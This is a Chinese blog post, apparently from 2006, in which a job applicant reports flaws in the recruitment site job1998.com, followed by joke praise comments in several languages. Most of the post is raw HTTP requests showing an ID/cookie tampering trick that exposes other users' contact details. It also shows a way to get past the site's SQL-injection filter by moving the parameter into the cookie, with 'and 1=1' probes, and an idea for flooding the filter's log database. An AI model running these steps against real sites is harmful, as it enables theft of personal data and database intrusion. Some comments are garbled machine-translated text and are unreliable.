前几天去应聘易才网的项目经理,他们让我写一个对易才网的个人意见。本来不想写了,不过经不住那边催促,勉强写了一篇,大部分的篇幅是对一个隐藏得比较深的漏洞的描述,昨天看的时候他们已经改了程序(这不代表就没了漏洞),所以把报告贴出来:
总体来说,易才网结构合理,相应的电话确认用户身份的服务也很到位,我主要说几个问题,提几个建议。
问题一:冗余数据错乱
典型表现:http://augustsummer.blog.job1998.com/blog/index.asp
在该blog内的不同栏目里先后出现了 郭先生的个人空间 ,郭小姐的个人空间,郭川的个人空间 三个称谓。
(在我再次查看此blog的时候,这些错乱没有了,可能是你们已经改了)
问题二:安全问题
这是我着重说明的一个问题,表面上看易才网的安全性较高,但是还有问题:用我的用户名登录,预览简历 抓包:
GET /company/person_detail.asp?Id=204007 HTTP/1.1
Accept: */*
Referer: http://www.job1998.com/person/viewresume.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.job1998.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSDQCDRA=DPFINABANGMGAHOKCKFFOOJD; AimPage=http%3A%2F%2Fwww%2Ejob1998%2Ecom%2Fcn%2Fcompany%5Flist%2Easp%3FSearch%5FKey%3D%B4%F3%CF%F3%26Job%5FPlace%3D%25CC%25EC%25BD%25F2%26x%3D29%26y%3D7; BestIntroTjjob=Name=wolfeng&Hits=19&Person%5FEnterNum=7&Person%5FName=%CD%F5%B7%E5&Person%5FId=204007&Person%5FReg%5FId=204048
修改数据包的id值和cookie里的person_fid值为同一个值,即可进行欺骗,程序应该是通过判断这两个值得一致性来判断是否是写简历的人。修改后的包,如下:
GET /company/person_detail.asp?Id=204008 HTTP/1.1
Accept: */*
Referer: http://www.job1998.com/person/viewresume.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.job1998.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSDQCDRA=DPFINABANGMGAHOKCKFFOOJD; AimPage=http%3A%2F%2Fwww%2Ejob1998%2Ecom%2Fcn%2Fcompany%5Flist%2Easp%3FSearch%5FKey%3D%B4%F3%CF%F3%26Job%5FPlace%3D%25CC%25EC%25BD%25F2%26x%3D29%26y%3D7; BestIntroTjjob=Name=wolfeng&Hits=19&Person%5FEnterNum=7&Person%5FName=%CD%F5%B7%E5&Person%5FId=204008&Person%5FReg%5FId=204048
用nc 提交,即可得到204008用户的隐藏资料:
姓名:张*
现 住 址: 邮 编:
固定电话: 移动电话: 85533**8
小 灵 通: 022-85533**8
E - mail: breakh**d@163.com
个人主页:
扩展一下这个应用,我知道job1998使用了一个通用的防止sql注入的小程序,输入 http://www.job1998.com/company/person_detail.asp?Id=204007 and 1=1 会被截获,那么我是否可以把Id写到cookie里,修改后的包如下:
GET /company/person_detail.asp HTTP/1.1
Accept: */*
Referer: http://www.job1998.com/person/viewresume.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.job1998.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSDQCDRA=DPFINABANGMGAHOKCKFFOOJD; AimPage=http%3A%2F%2Fwww%2Ejob1998%2Ecom%2Fcn%2Fcompany%5Flist%2Easp%3FSearch%5FKey%3D%B4%F3%CF%F3%26Job%5FPlace%3D%25CC%25EC%25BD%25F2%26x%3D29%26y%3D7; BestIntroTjjob=Name=wolfeng&Hits=19&Person%5FEnterNum=7&Person%5FName=%CD%F5%B7%E5&Person%5FId=204008&Person%5FReg%5FId=204048;Id=204008
提交后,依然可以看到204008的详细信息,这说明我这个id放到cookie里是有作用的,说明job1998的程序里采用的是 request(“id”)而不是request. querystring(“id”)来获取id值,这样我的数据就能绕过那个通用防止sqlinjection的post和get验证了,继续构造,在cookie里添加注入探测:
GET /company/person_detail.asp HTTP/1.1
Accept: */*
Referer: http://www.job1998.com/person/viewresume.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.job1998.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSDQCDRA=DPFINABANGMGAHOKCKFFOOJD; AimPage=http%3A%2F%2Fwww%2Ejob1998%2Ecom%2Fcn%2Fcompany%5Flist%2Easp%3FSearch%5FKey%3D%B4%F3%CF%F3%26Job%5FPlace%3D%25CC%25EC%25BD%25F2%26x%3D29%26y%3D7; BestIntroTjjob=Name=wolfeng&Hits=19&Person%5FEnterNum=7&Person%5FName=%CD%F5%B7%E5&Person%5FId=204008&Person%5FReg%5FId=204048;Id=204008+and+1%3D1
返回正确信息,当然此时person_fid和id值不相等,不再会显示用户的电话等信息,但是这个不是重点,重点是可以注入了,为了小心起见,我又提交了一个数据包:
GET /company/person_detail.asp HTTP/1.1
Accept: */*
Referer: http://www.job1998.com/person/viewresume.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.job1998.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSDQCDRA=DPFINABANGMGAHOKCKFFOOJD; AimPage=http%3A%2F%2Fwww%2Ejob1998%2Ecom%2Fcn%2Fcompany%5Flist%2Easp%3FSearch%5FKey%3D%B4%F3%CF%F3%26Job%5FPlace%3D%25CC%25EC%25BD%25F2%26x%3D29%26y%3D7; BestIntroTjjob=Name=wolfeng&Hits=19&Person%5FEnterNum=7&Person%5FName=%CD%F5%B7%E5&Person%5FId=204008&Person%5FReg%5FId=204048;Id=204008+and+1%3D2
返回的页面是空信息,由上述说明,在cookie里可以构造任意的sql注入程序了,这样就绕过了那个防注入的检测程序,危险重来。
顺便说一下那个防注入的程序,我不知道你们在是否也默认把每次有非法信息的数据都存入数据库(这个小程序原来应该是这样的),但是我建议不要把非法的数据记录写入数据库,因为这样面临一个问题:我可以通过一个小程序,反复提交长度很大的非法信息,可能会很快会挤爆那个数据库。
建议一
增加企业用户的找回密码功能。
建议二
收费用户的域名可修改为比较简单简单的二级域名,比如augustsummer.blog.job1998.com 可修改为augustsummer.job1998.com,方便用户,可能易才网考虑到将来的自身业务的一个扩展问题,但是我认为只要限制用户的二级域名的前缀在四位以上就可以了。保留四位以内的泛域名足够了。
2006-4-27 13:24:45
易才网的漏洞
Tags:
发布:wolfeng | 分类:入侵实录 | 评论:3 | 引用:0 | 浏览:
- 相关文章:
2.onlyyou- 看了楼主的帖子,不由得精神为之一振,自觉七经八脉为之一畅,七窍倒也开了六巧半,自古英雄出少年,楼主年纪轻轻,就有经天纬地之才,定国安邦之智,古人云,卧龙凤雏得一而安天下,而今,天佑我大中华,沧海桑田5000年,中华神州平地一声雷,飞沙走石,大舞迷天,朦胧中,只见顶天立地一金甲天神立于天地间,这人英雄手持双斧,二目如电,一斧下去,混沌初开,二斧下去,女娲造人,三斧下去,小生倾倒.得此大英雄,实耐之幸也,民之福也,怎不叫人喜极而泣.......古人有少年楼主说为证,少年之楼主如红日初升,其道大光;河出伏流,一泻汪洋;潜龙腾渊,鳞爪飞扬;乳虎啸谷,百兽震惶;鹰隼试翼,风尘吸张;奇花初胎,皇皇;干将发硎,有作其芒;天戴其苍,地履其黄;纵有千古,横有八荒;小生对楼主之仰慕如滔滔江水连绵不绝,海枯石烂,天崩地裂,永不变心.
看完楼主的帖子,我的心情竟是久久不能平静。正如老子所云:大音希声,大象无形。我现在终于明白我缺乏的是什么了,正是楼主那种对真理的执着追求和楼主那种对理想的艰苦实践所产生的厚重感。面对楼主的帖子,我震惊得几乎不能动弹了,楼主那种裂纸欲出的大手笔,竟使我忍不住一次次地翻开楼主的帖子,每看一次,赞赏之情就激长数分,我总在想,是否有神灵活在它灵秀的外表下,以至能使人三月不知肉味,使人有余音绕梁、三日不绝的感受。楼主,你写得实在是太好了。我惟一能做的,就只有把这个帖子顶上去这件事了。
楼主的帖子实在是写得太好了。文笔流畅,修辞得体,深得魏晋诸朝遗风,更将唐风宋骨发扬得入木三分,能在有生之年看见楼主的这个帖子。实在是我三生之幸啊。看完楼主的这个帖子之后,我竟产生出一种无以名之的悲痛感——啊,这么好的帖子,如果将来我再也看不到了,那我该怎么办?那我该怎么办?直到我毫不犹豫地把楼主的这个帖子收藏了,我内心的那种激动才逐渐平静下来。可是我立刻想到,这么好的帖子,倘若别人看不到,那么不是浪费楼主的心血吗?经过痛苦的思想斗争,我终于下定决心,牺牲小我,奉献大我。我要拿出这帖子奉献给人赏阅,我要把这个帖子一直往上顶,往上顶!顶到所有人都看到为止!
在遇到你之前,我对人世间是否有真正的圣人是怀疑的;而现在,我终于相信了!我曾经忘情于两汉的歌赋,我曾经惊讶于李杜的诗才,我曾经流连于宋元的词曲。但现在,我才知道我有多么浅薄! 楼主,你的高尚情操太让人感动了。在现在这样一个物欲横流的金钱社会里,竟然还能见到楼主这样的性情中人,无疑是我这辈子最大的幸运。让我深深感受到了人性的伟大。楼主的帖子,就好比黑暗中刺裂夜空的闪电,又好比撕开乌云的阳光.
说得好啊!我在XX社区打滚这么多年,所谓阅人无数,就算没有见过猪走路,也总明白猪肉是啥味道的。一看到楼主的气势,我就觉得楼主同在社区里灌水的那帮小混混有着本质的差别!那忧郁的语调,那熟悉的签名,还有字里行间高屋建瓴的辞藻。没用的,楼主,就算你怎么换马甲都是没有用的,你的亿万拥戴者早已经把你认出来了,你一定就是传说中的最强ID。自从社区改版之后,我就已经心灰意冷,对社区也没抱什么希望了,传说已经幻灭,神话已经终结,留在社区还有什么意思?没想到,没想到,今天可以再睹楼主的风范,我激动得忍不住就在屏幕前流下了眼泪。是啊,只要在楼主的带领下,社区就有希望了。我的内心再一次沸腾了,我胸腔里的血再一次燃烧了。楼主的几句话虽然简单,却概括扼要,一语道出了我们苦想多年仍不可解的几个重大问题的根本。楼主就好比社区的明灯,楼主就好比社区的方向,楼主就好比社区的栋梁。有楼主在,社区的明天必将更好!
大师的话真如“大音希声扫阴翳”,犹如“拨开云雾见青天”,使我等网民看到了希望,看到了未来!晴天霹雳、醍醐灌顶或许不足以形容大师文章的万一;巫山行云、长江流水更难以比拟大师的文才!黄钟大吕,振聋发聩!你烛照天下,明见万里;雨露苍生,泽被万方!透过你深邃的文字,我仿佛看到了你鹰视狼顾、龙行虎步的伟岸英姿;仿佛看到了你手执如椽大笔、写天下文章的智慧神态;仿佛看见了你按剑四顾、指点江山的英武气概!
逐字逐句地看完这个帖子以后,我的心久久不能平静,震撼啊!为什么会有如此好的帖子!我纵横网络BBS多年,自以为再也不会有任何帖子能打动我,没想到今天看到了如此精妙绝伦的这样一篇帖子!楼主,是你让我深深地理解了“人外有人,天外有天”这句话。谢谢侬!在看完这帖子以后,我没有立即回复,因为我生怕我庸俗不堪的回复会玷污了这网上少有的帖子。但是我还是回复了,因为觉得如果不能在如此精彩的帖子后面留下自己的网名,那我死也不会瞑目的!能够在如此精彩的帖子后面留下自己的网名是多么骄傲的一件事啊!楼主,请原谅我的自私!我知道无论用多么华丽的辞藻来形容楼主您帖子的精彩程度都是不够的,都是虚伪的,所以我只想说一句:您的帖子太好看了!我愿意一辈子看下去!这篇帖子构思新颖,题材独具匠心,段落清晰,情节诡异,跌宕起伏,主线分明,引人入胜,平淡中显示出不凡的文学功底,可谓是字字珠玑,句句经典,是我辈应当学习之典范。正所谓:“一马奔腾,射雕引弓,天地都在我心中!”楼主真不愧为无厘界新一代的开山怪!本来我已经对这个社区失望了,觉得这个社区没有前途了,心里充满了悲哀。但是看了你的这个帖子,又让我对社区产生了希望。是你让我的心里重新燃起希望之火,是你让我的心死灰复燃,是你拯救了我一颗拔凉拔凉的心!本来我决定不在社区回任何帖子了,但是看了你的帖子,我告诉自己这个帖子是一定要回的!这是百年难得一见的好贴啊!苍天有眼啊,让我在有生之年得以观得如此精彩绝伦的帖子!
英文版
it is first to be announced by the fans of the andylau:at see over this son hereafter word by word and sentence by sentence, my heart can''t be calm once in a very long while, shocking!why would like a son that like?!many years in bbs in horizontal network in my life , from thinking any further can''t there is any a son can move me, have never thought to come in sight of such ingenious and incomparable like this an a son today. floor lord, is you let me comprehending the‘someone outside the person profoundly, there is day outside the day'' this words.thank you ! at see over this son hereafter, i did not replies immediately, because i fear me the vulgar replies unbearablely will compromise this net last rare a son.but i replied still, because feel if can''t leave behind at the such fascinating a son own net, that i die too can''t the purpose of name !can leave own net an a matter for is how pride behind at the such fascinating a son!floor lord, beg your pardon my selfish! i know that describe the floor lord you with the how gorgeous words regardless the fascinating degree of a son is all not enough, is all hypocritical, so i think only of to say a:your a son is too good-looking!i would like to the lifetime sees the bottom! this son conceives outline novel, the topic has the mental strategy only, the paragraph is clear, details , fall the rise and fall, the main line is clear, fascinating, mild the extraordinary literature from bottom inside, is witty it may be said, a classic, is a model that my generation should the study. in regard to the angle of the cloak-and-dagger art, this son do not calculate too successful, but it of the experiment is however the far far larger than in meaning the success oneself.positive so-called:" a the horse dashes about, shooting the birds lead the bow, the world is all in my heart!" floor lord really not the is to has boundary new generation to open the mountain strange! i will have disappointed to this community originally, feeling that this community had no the prospect, the in the mind is filled with the woe.but saw your this son, let me producing the hope to the community again.is a fire that you let my in the mind set alight the hope afresh, is you make my heart cold ashes burn again, is you rescued me a stirs the cool stiring the cool heart! i decide originally and can''t return to any a son in the community, but saw your a son, it is what must return that i tell the oneself this son!this is once-in-a-lifetime o.k. stick!heaven contain eye, let me getting the such fascinating and incomparable a son at the excellent the can view in year that living! floor lord, you want to continue diligent!you are the hope of the community!
兽语版
一字いっくこの招待状を讀み終わってから,私の心は長い時間平静になることができない.震かんしなさい!どうしてこのようなよい招待状がありますか. !私の思うままにネツト.ヮ-クbbsは数年,その以上どんな招待状が私を感動することができるはずがないと自分で思います.きょうェキスの立派な最も人の道のこんな一の招待状このようなを見たと思わなかった. ビルは主人,ましたが,貴方は私に深深ので地理は溶けるさせる''人をあるない,そらをあるない''この話. ??がありがとうございました!から私私俗っぼくで堪えられないの返事されてこのィンタワ-クの上すくないなある招待状をごすことができただかひゃひゃするならたか.しかし私やはり返事するですですなら,から感じるならもしことができない素晴らしいではないな招待状の後ろで自分のネットの名前を残しておく,私は死んで目的も閉じるはずがないです !このような素晴らしい招待状の後ろで自分の网の名前を残しておくことができるのがなんと傲慢な一つ?のことです!ビルの主人,すみません,のは利己的です! 私はなんとはなやかな詞そうでビルを形容しても,重要ですあなたの招待状の素晴らしい程度は全部足りないと知っています.全部僞りて,だから私はただ一句話したいです あなたの招待状はとてもきれいです!私は望んで生涯のは見続けます!この招待状の構想は新奇で,題材がォリジナリティ-に富んでいて,だんらくは明らか.プロットはあやしくて,こだわらなくて,重要な線は明らか.人を引きつけて佳境に入らせて,起こると示す非凡な文学の基礎に平板にあたって,という文字の文字の珠玉です. 句経典なら,ました私の一生べき勉?姢蔚浞?小説芸術の角度話で,その実験意味はか.いわゆっています "一つの馬が飛び跳ぬって,射雕英雄?护弦い魄菠?天地はすべて私の心内にあります! "ビルは前兆が本当におかしくない! もともと私はもうこのコミュニティに?して失望して,このコミュニティは将来がないと感じます.心で悲しく満ち溢れました.しかしお訪ねしたこの招待状,また私をコミュニティに希望が生まれさせました.貴方の私の心にもう一度希望を燃え上がらせる火で,私 の心を失脚した?櫲摔蓼縿荬い颏猡辘à丹护毪韦F方.一の私救ってから冷たく回して冷たい心を回すのが貴方です!もともと私はコミュニティでどんな招待状を返すはずがなかったと決めたが,お訪ねした招待状.私は自分にこの招待状がきっと返すだろうこと を知らせます!これさんはか!蒼天は目がありますあっ,私にになりすぐれている年に最も人の道の招待状をこのような素晴らしく見ることができさせます!ビルの主人,貴方は努力を続けなければならないです!貴方はコミュニティの希望で
西班牙文版
después que acabar de leer esta palabra ejemplar por palabra y oración por la oración, el corazón no puede ser calmo durante mucho tiempo, sacude! ?por quéhay tan bueno un modelo? ?! mi red horizontal vertical bbs ha pensado por muchos a?os que nunca habrácualquiera modela eso tiene me podría mover, yo nunca había esperado que eso visto tan exquisito más alláde compara un un modelo hoy. el piso el hecho principal, es usted que permitiómíentender '' gente alguien, hay afuera en día '' esta oración profundamente. ?gracias! en este modelo de acabar de mirar, yo tengo contestación inmediatamente, porque temo que pueda manchar estos raro ejemplar en línea por contestación vulgar que no puede soportar. ?pero he contestado, porque pienso que si no puedo salir un propio nombre de la red en la espalda de tan excelente un modelo, el propósito que yo no cerraréuno mira cualquiera cuándo morir! ?salga cuántos orgulloso uno un pedazo del nombre de thingses una propia red en la espalda del modelo excelente tan! ?el hecho principal del piso, los unos que dispensan míson egoístas! ?séque ninguna cuestión con el idioma florido cuán magnífico viene y describe los grados excelentes del modelo suficiente principal usted piso, es todo falso, asíque yo sólo quiero decir una oración: su modelo es interesar demasiado! ?estoy ver dispuesto abajo todo una vida! el complot de este modelo es novedoso, el tema es original y diferente, el párrafo es claro, el complot es extra?o, del ritmo corriente, el hilo se demarca claramente, demuestra la literatura extraordinaria basado en las habilidades básicas en es fascinador, lánguido puede sea llamado bien ser cada palabra una gema, cada oración clásico, es yo vidas deben los modelos de estudios. cuando elángulo de respectos del arte de la novela, el modelo incluye y triunfa tanto, el experimento significa de ello más queél mismo de posterior lejos. ?el llamado: "un caballo se encrespa hacia adelante, penetra y talla e indica doblando, el mundo estáen mi mente! ? "el piso principalmente merece realmente ser llamado teniendo un long island del círculo que corta en una monta?a de la generación nueva extra?amente! he sido desilusionado ya a esta comunidad originalmente, no había pensado este futuro de hadded de comunidad, apenóque el corazón estárepleto de. pero ha leído este modelo de suyo, permitióque míprodujera la esperanza a la comunidad otra vez. ?son usted permitir encender el fuego esperóotra vez en mi corazón, es usted que permitióque el corazón reviviera, es usted que ha salvado mi uno y lo apartórefresca y apartóel corazón fresco! ?originalmente determino a ser puede tener estuvo en la comunidad vuelve ejemplar, piensa su modelo, yo digo este modelo de símismo! ?esto es raro ver y fácil de atascar en un siglo! ?el cielo tiene ojos, yo en aristogenesis anual a obtiene para estar en la vista los modelos no superados tan excelentes! ?el hecho principal del piso, usted debe continuar los esfuerzos! ?usted es una esperanza de la comunidad!
德文版
nachdem lesen von diesem modell wort durch wort und satz durch satz aufh?rend, kann mein herz ruhig für eine lange zeit nicht sein, schüttelt! warum gibt es so gut ein modell? ! mein senkrecht horizontal netz bbs hat für viele jahre gedacht, da? nie es irgendeine modelle geben wird, die bewegung mich k?nnen müssen, hatte ich nie erwartet, da? das sieht so vorzüglichüber hinaus ein ein modell heute vergleicht. boden haupttatsache, es ist sie, der mich verstehen l??t '' leute jemand, gibt es es drau?en auf tag '' dieser satz tief. vielen dank! an diesem modell, zuschauen aufzuh?ren, mu? ich sofort erwidern, weil ich befürchte, da? ich dieses seltene modell online durch gemeine erwiderung beflecken kann, da? nicht tragen kann. aber ich habe erwidert, weil denkt, da? wenn kann verlassen einen eigenen netz namen im hinteren von so ausgezeichnet ein modell, der zweck die ich nicht eine augen nicht schlie?en werde, entweder wenn sterben! verlassen sie wie viele stolzen einen stück thingses namen ein eigenes netz im hinteren von ausgezeichnetem modell damit! die haupttatsache sind derjenig des bodens, des, die mich entschuldigen, selbstsüchtig! ich wei? keine materie mit, wie pr?chtige geblümte sprache kommt, und beschreibe die ausgezeichneten grade des modells genug haupt sie boden, ist alle falsche, deshalb will ich nur einen satz: ihr modell zu interessant sagen ist! ich bin bereites sehen hinunter alles ein leben! das grundstück dieses modells kann roman, der themenbereich ursprünglich und verschieden, der absatz klar, das grundstück unheimlich, von flie?en rhythmus, der faden deutlich, es aus der gew?hnlichen literatur, die in grundkenntnissen in werden fasziniert erdet, das, es gut genannt werden ist ist ist ist sind demarkiert vorführt abstumpft, jedes wort ein edelstein, jeder satz klassiker, es zu sein, ich ist lebenszeiten die modelle der studien sollen. als beachtungen winkel der kunst vom roman, das modell miteinschlie?t und sehr gelingt viel, das versuch mittel davon gr??er als sich von folgend weit. das sogenannte: "ein pferd wogt vorder, durchdringt und schnitzt und führt biegen, die welt in meinem gemüt ist! "der boden verdient haupts?chlich wirklich, gerufen zu werden, einen li von kreis schneiden in einen berg neuer generation hat fremd! ich bin zu dieser gemeinschaft ursprünglich, nicht diese gemeinschaft hadded zukunft schon entt?uscht worden hatte gedacht, getrauert worden ist, die da? das herz voll von ist. aber dieses modell von ihrem hat gelesen, l??t, da? mich der gemeinschaft die hoffnung wieder herstelle. sie sind zu lassen, das feuer anzuzünden, das für wieder in meinem herzen gehofft wird, ist es sie, da? da? mein herz wiederbelebt l??t, ist es sie, da? mein ein gespart hat, und hat beiseite es abkühlt gelegt und hat beiseite das kühle herz gelegt! ursprünglich bestimmt ich es, zu sein, in gemeinschaft kann zurück irgendein modell haben ist gewesen geht, denkt ihr modell, ich dieses modell von sich erz?hle! dies ist selten zu sehen und leicht, in einem jahrhundert zu stecken! himmel mu? be?ugen, wird ich an aristogenesis der j?hrlich ist zu ihm an blick damit ausgezeichnete unübertroffene modelle! die haupttatsache des bodens sollen, sie bemühungen fortsetzen! sie sind eine hoffnung der gemeinschaft!
意大利文版
dopo che la lettura di finire questa parola di modello dalla parola e la frase dalla frase, il mio cuore non puòessere calmo per tanto tempo, la scossa! perchéciècosíbuono un modello? ! il mio bbs di rete verticale orizzontale ha pensato per molti anni che ci non saranno mai qualunque modelli che hanno me potrebbe muovere, ciònon ero mai aspettato vede cosísquisito oltre paragona un un modello oggi. il pavimento fatto principale,èlei che ha lasciato me capisce '' le persone qualcuno, cièesso fuori sul giorno '' questa frase profondamente. ringraziarlo! a questo modello di finire osservazione, io ho risposta immediatamente, perchéio temo io posso macchiare questo raro modello in linea da volgare risposta che non puòportare. che la la la. ma ho risposto, perchépensa che se no puòpartire l''un proprio nome di rete nel dorso di cosíeccellente un modello, lo scopo che non chiuderògli uni occhi sia quando morire! il congedo quanto orgoglioso un un pezzo di nome di thingses l''una propria rete nel dorso di modello eccellente cosí! il fatto principale del pavimento, l''ones che si scusa siamo egoistico! io sa non importa con come magnifico fiorito linguaèvenuto e descrive l''eccellente gradi di modello abbastanza lei pavimento, sono tutto falso, dunque io soltanto vuole dire una frase: il suo modello troppo interessa! sono vedere disposto giùtutta la vita! il complotto di questo modelloèromanzo, la questioneèoriginale e diverso, il paragrafoèchiaro, il complottoèmisterioso, di scorrere ritmo, il filo chiaramenteèdemarcato, esso dimostra fuori dal comune letteratura metta a terra in fondamentali abilitìin essere affascinare, offusca lo puòbeneètermed essere ogni parola una gemma, ogni frase classica, essoèio vite dovrebbero i modelli di studi. che per dell''il l''il le le. per quanto riguarda l''angolo di arte del romanzo, il modello include e riesce molto, i significati di esperimento di esso piùgrande di sédi riuscire lontano. il cosíchiamato: "un cavallo ondeggia in avanti, penetra e taglia e guida per piegare, il mondoènella mia mente! "il pavimento realmente merita essere principalmente chiamato per avere un li di taglio di cerchio in una montagna di generazione nuova stranamente! sono stato giàdeluso a questa comunità, non aveva pensato originalmente questo futuro di hadded di comunità, afflitto che il cuoreèpieno di. ma ha letto questo modello di vostro, me ha lasciato produce la speranza alla comunitàancora. lo sono lasciare per accendere il fuoco sperato per ancora nel mio cuore,èlei che ha lasciato il mio cuore rianima, loèche ha risparmiato il mio un e l''ha messo da parte raffredda e ha messo da parte il cuore fresco! originalmente io determina di essere puòavereèstato nella comunitàritorna qualunque modello, pensa il suo modello, dico questo modello di sèstesso! questoèraro per vedere e facile di conficcare in un secolo! cielo ha occhi, io a aristogenesis annuale a esso prende essere a veduta cosíinsuperato modelli! il fatto principale del pavimento, lei dovrebbe continuare degli sforzi! lei sono una speranza della comunità!
挪威文版
etter avsluttingsav lesning dette modellord ved ord og setning ved setning mitt hjerte er ikke rolig p? lenge, shake! er hvorfor der slik god en modell? ! mitt vertikal horisontal nettverk bbs har tanke i mange ?rene som aldri det er noen modeller som har flytter meg, i aldri ventet at det ser slik uts?kt hinsides sammenlikner en en modell i dag. gulv hovedfaktum, det er de som lar meg forst? '' folk noen, det er det ute p? dag '' denne setningen dypt. mange takk! p? denne modellen av avslutningsav vokting har i svar straks, fordi i frykt i flekker disse sjeldene modellen v?rer som on-line ved vulg?rt svar som ikke b?rer. men i svart, fordi tror at om ikke forlater et egent nettverksnavn i ryggen av slik utmerket en modell, the form?l som i stenger ikke en ?yne enten n?r d?ing! forlate hvor mange stolt et stykke thingsesnavn et egent nettverk i ryggen av utmerket modell slik! hovedfaktum av gulvet, de som unnskylder meg er egoistisk! jeg vet ikke noen materie med hvordan praktfull flowery spr?k kommer og beskriver de utmerkete gradene av modell nok hovedledning de gulv, are all falskt, derfor i bare sier en setning: your modell er ogs? interessant! jeg er villig seing ned all et liv! teigen av denne modellen er roman, stoffet er originalt og forskjellig, hovedavsnittet er klart, the teig er hemmelighetsfull, av ? str?mme rytme, tr?den er tydelig demarcated, it demonstrerer ut av den vanlige litteraturjording i grunnleggendee ferdigheter i v?ringssom fascinerer, sl?ver det godt er termed v?re hver ord en edelstein, every setningsklassikere, det er i livstider skal modellene av studier. med hensyn til vinkel av kunst av romanen inkluderer modellen og lykkes meget mye, eksperimentbetydningene av det stor enn seg av etterf?lgende fjernt. det s?kalte: "trenger gjennom a hest?kninge frem, og skj?rer og f?rer b?ying, den verdenen er i mitt sinn! "gulvet hovedsakelig fortjener virkelig har en li av kretsskj?ring inn i et fjell av ny produksjon merkelig! jeg skuffet allerede til dette fellesskapet opprinnelig, hatt ikke tanke denne fellesskap hadded fremtid, grieved at hjertet er fult av. men har leser denne modellen av deres, lar meg produsere h?pet til fellesskapet igjen. er de la tenne brannen som h?pet for igjen i mitt hjerte, er det de at lar mitt hjerte gjenoppliver, it er de som sparer mitt et og setter til side som det avkj?ler og setter til side det kj?lige hjertet! opprinnelig fastsetter i som det v?re har v?rt i fellesskap drar tilbake noe modell, tror deres modell, i forteller denne modellen av oneself! dette er sjelden se og lett stikke om et ?rhundre! himmel har ?yne, i p? aristogenesis som v?rer ?rlig til det blir p? sikt slik utmerkete uovertruffene modeller! hovedfaktum av gulvet, de fortsetter innsatser! de er et h?p av fellesskapet - 2006-5-9 13:23:15 回复该留言
- 3.heroroby
- 好贴
真好贴
确实好帖
少见的好帖
真他妈的 好帖
难得一见的好帖
千年等一回的好帖
好得不能再好的好帖
惊天地且泣鬼神的好帖
让人阅毕击掌三叹的好帖
让人佩服得五体投地的好帖
让人奔走相告曰须阅读的好帖
让斑竹看后决定加精固顶的好帖
让人看后在各论坛纷纷转贴的好帖
让人看后连******网站都没兴趣的好帖
让人看完后就要往上顶往死里顶的好帖
让人看后不断在各种场合重复引用的好帖
让人一见面就问你看过某某好帖没有的好帖
让人半夜上厕所都要打开电脑再看一遍的好帖
让个读过后都下载在硬盘里详细研究欣赏的好帖
让人走路吃饭睡觉干什么事连做梦都梦到它的好帖
让人翻译成36种不同外语流传国内外世界各地的好帖
让人纷纷唱道过年过节不送礼要送就送某某帖子的好帖
让国家领导人命令将该帖刻在纯金版上当国礼送人的好帖
让网络上纷纷冒出该帖的真人版卡通版搞笑版成人版的好帖
让人在公共厕所里不再乱涂乱化而是纷纷对它引经据典的好帖
让某位想成名的少女向媒体说她与该帖作者发生过性关系的好帖
让人根据它写成小说又被不同导演拍成48个不同版本的电影的好帖
让某名导演跟据此帖改拍的电影在奥斯卡上一连拿了11个奖项的好帖
让人大代表们看完后联名要求根据该帖的内容对宪法做适当修改的好帖
让人为了谁是它的原始作者纷纷地闹上法院打官司要争得它的版权的好帖
让各大学府纷纷邀请该帖作者去就如何发表优秀网络文学为题目演讲的好帖
让人为了该帖而成立了各种学会来研究并为不同的理解争得眼红脖子粗的好帖
让美国警察于今后逮捕人说你有权保持沉默还有权阅读某某帖子要不要啊的好帖
让本******躲在山洞里还命令他手下冒着被美军发现的危险去上网下载来阅读的好帖
让萨达姆被捕时被发现他随身携带的除了一把******之外还有的就是它的复印件的好帖
让比尔盖茨在懂事会上发给与会者人手一份该帖命令仔细阅读后才讨论其他事宜的好帖
让诺贝儿奖理事会破天荒地因该帖的出现而开会讨论一直决定今后设立最佳帖子奖的好帖
让马来西亚政府海啸预警部在得知海啸到来前通过急电告知海边游客要在遇难前阅读的好贴
让本人为喜欢的女孩而每次上网都要来此论坛痴痴的等待她等待她看完此贴后能接受我的好帖 - 2006-5-11 12:25:46 回复该留言
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
